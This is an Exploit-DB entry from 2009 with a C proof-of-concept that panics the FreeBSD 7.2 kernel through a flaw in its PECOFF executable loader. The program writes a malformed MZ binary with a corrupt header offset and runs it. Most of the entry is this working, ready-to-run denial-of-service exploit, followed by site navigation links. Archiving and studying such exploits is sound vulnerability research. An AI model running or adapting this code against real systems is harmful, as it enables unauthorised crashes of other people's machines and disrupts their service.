FreeBSD 7.2 - 'pecoff' Local Denial of Service

EDB-ID:

9206

CVE:


EDB Verified:

Author:

Shaun Colley

Type:

dos

Exploit:   /  

Platform:

FreeBSD

Date:

2009-07-20

Vulnerable App: 
/* pecoff_panic.c
 *
 * by Shaun Colley, 20 July 2009
 *
 * this code will panic the freebsd kernel due to a bug in the PECOFF executable loader
 * code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`)
 *
 * panic(9) is in vm_fault due to a page fault.  the panic seems to be caused in
 * generic_bcopy...probably hitting a guard page..maybe exploitable(??) but this is just
 * a DoS at the moment :)  (ugly code btw)
 *
 * tested on freebsd 7.2-RELEASE
 *
 * - shaun
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

int main() {
int i, fd;
system("rm -rf evilprog.exe; touch evilprog.exe");
fd = open("evilprog.exe", O_WRONLY);
char buf[0x3a+2+0x04+4000];
buf[0] = 'M';
buf[1] = 'Z';  /* magic */
for(i = 2; i<0x3c; i++) buf[i] = 'a';
buf[0x3c] = 0xee;
buf[0x3d] = 0xee;
buf[0x3e] = 0xee;
buf[0x3f] = 0xee;
for(i = 0x40; i<(0x40+4000); i++) buf[i] = 0x61;
write(fd, buf, 0x3a+2+0x04+4000);
close(fd);
system("chmod 700 evilprog.exe");
system("./evilprog.exe");  /* run the dodgy PECOFF binary */
}

// milw0rm.com [2009-07-20]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services